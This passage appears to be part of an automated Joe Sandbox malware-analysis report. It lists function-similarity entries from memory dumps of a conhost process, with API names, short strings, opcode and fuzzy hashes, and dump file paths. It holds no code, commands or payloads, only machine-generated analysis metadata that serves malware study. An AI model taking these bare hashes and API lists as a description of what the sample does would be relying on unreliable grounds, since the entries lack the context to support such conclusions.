                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: efef181d9041e5bdc727d28c784f1bc4dc17641553488d2d864364fdb4984d0b
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: A1F09671319E0089FF148B24F8C43A963A0FB44BA5F541219C76A852F4EF3CC049E700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: f683c3630e1b7a44d7615040bde159651ae2f9df42aeb2fcfa7e2f913512e2f9
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: 3702CA3621DB948AEB60CB59F59439AB7E0F3C4794F100115EB8E87BA8EB7DC854DB00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: b704e71cc39e87cb397920f7996481d8c0980000fd8d472db17156e02ddbc5dc
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: 8861C83651DA54CAEB609B16F58439AB7E0F388B84F504115EB8E47BB8EB7DC950DF00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 043c364b9d4a95e6fd3743d88b1ccff48b5b7db012de15f136be2776490f4f74
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 9411A332A1CB104DFE541768F4C63EB31E2FB55374F050634BB66C72FAFA6A8884A181
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 43cef54a3338e55a7097a972b6d8bc0f3c9d209b2646d3ad7563f1e9377f18e5
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 3311AC72A1CE0049FE641768F4C6BE911D0BF593B8F494624EB76C76FAEA2888456200
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 460ecc503d2186cdbbd2e73aa9df040e9b1c53d1ffdd33e31d4b14a253e26d45
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: E0618C73608B948AEB64DF65E4803ED7BE0F348B88F044215EF5917BA9EB38D5A5D700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 8ca3eb69dc5922fec1d8d39842d0dbfe659504a2b72b01adb7ae290cdae52f62
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 20517D32108380CEEF748F26A58439977E0F354B99F145116EB99A7BE5EB38D461EB01
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 00f61466da1fde8208a06350e0743895f8a66b9fa396c11e96be43c9fd2544ef
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: DD517C322086A0CEEF649FA5B4943AC77E0F355B84F144216DB8987BE5EB38D4B1E701
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 6ff53002e7311ccbc260ff3840f4a39f3f0bf47876e1bfb530d94f5637898aff
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: A5113D31318A619AFF609B29F8853DA62E5F785780F944135AB49C3BB4FF38C925E740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: 2606ce5e1604f9996c77700c61670735bf026a26f6a8b0206751860bcd12478c
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: 37D1AD32B08A808EEF11CFA9E4802DC3BF5F354B98F144216CF5997BA9EA34C45AD740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: cb981b2c927b80340f727442a69f175b1a5c3fcf92e6e66e8fe4d8b69f4db14f
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: 65012136618E90CADB44DF66F88419AB7E5F788F81F044425EF4993729EF38C455D740
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000014ECB4B2D9B), ref: 0000014ECB4B2ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000014ECB4B2D9B), ref: 0000014ECB4B2F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: fa883167bd0f39eab7330fdd754d9f7e680349b8f6c244053ea31aca32ffb997
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: E391A172718A509DFF61DF6AA4C03EE7BE1B754B88F544109DF0A97AA9EB34C442E700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: 8c3a64ffed7f3241deb6c345a5a1af3eaf3c4365081b12bddd74464ebd3714d6
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: CD112A36754F008AEF40DF61F8953E933A4F719B58F440E21DB6D86BA4EB78C1A89380
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 327cbeb1b25d94e30865976371b659ccb76cc1f76020cb7fc6fc26ad0746da85
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: 027191362087A14AEF24DF26A8C43EAB7D1F785B84F45011AEF4943BA9EF34C614E740
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: e64a2298cd41d3aec9e83a4837c59a2a93894ec0a3a689e10b0c32773893aaa2
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: 6E615533608B848AEB20DF65E4803DD77E0F348B88F144215EF4967BA9EB78D595D700
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: 26a34ca8140d5b6782c837618b6e6f9492d47fe25b08c83a6f2827b2187dc893
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 9751AF3220C7A18AEE649B26B8E43EAB7D5F385780F440025DF4953BA9FB39C464F740
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: 48cd718d08c447425f76de0a5c8bb0694ae89d13908c770e30d27bc986d47a7c
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: 3F61463192DF588CD9539BB9B8923A577987F527C5F41D307EA0AB1A72F7179043E200
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 4cc2fea11d58c383f4b2d4d2e48675e1969bc90da95d5cd4ba07b5956df6ff6e
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: 30419F72218A408ADF60CF25F4853EA77A1F798794F804125EF4D877A8EF78C541D740
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: 916d00dec64bfa9cee5d0b927f8533ba1ce2f79c870591d517cd3f95bc3221f0
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: 6D11F832219B8496EB618F15F48039AB7E5F788B94F584225EF8D47B68EF3CC561DB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: e241aad1e42cceb9e8dc81d22c3b89081eecb76c870fab82fc01749aaf1efc11
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 4FE08671A45B44D4DF018F22F4C02D833E0FB58B58B499122DB5C46361FA38D5E9C340
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: 9a78ed5e1ceb7082c07a5eaa5815447d9467fc6ed71737e5f97eefab74266bed
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: 5BE08671A05B44C4DF028F21E4C01D833A0F758B58B889122CB5C46361FA38D5E5C340
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: e01fec8fdcd9795999e355c65041d5715ebd5fdcfa3ed192c2825a22ad945997
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 2BD09E32219A849DEE10EB04F8C57C973B4F394309FD04411D34D819B5EF29CA8AE750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
